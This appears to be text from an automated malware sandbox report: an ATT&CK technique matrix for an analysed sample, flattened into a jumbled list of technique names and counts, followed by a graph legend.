                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts11
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                12
                Process Injection
                1
                Obfuscated Files or Information
                LSASS Memory12
                System Information Discovery
                Remote Desktop Protocol1
                Input Capture
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter
                1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                2
                Software Packing
                Security Account Manager111
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive1
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                Scheduled Task/Job
                Login HookLogin Hook1
                DLL Side-Loading
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets121
                Virtualization/Sandbox Evasion
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input Capture13
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
                Virtualization/Sandbox Evasion
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.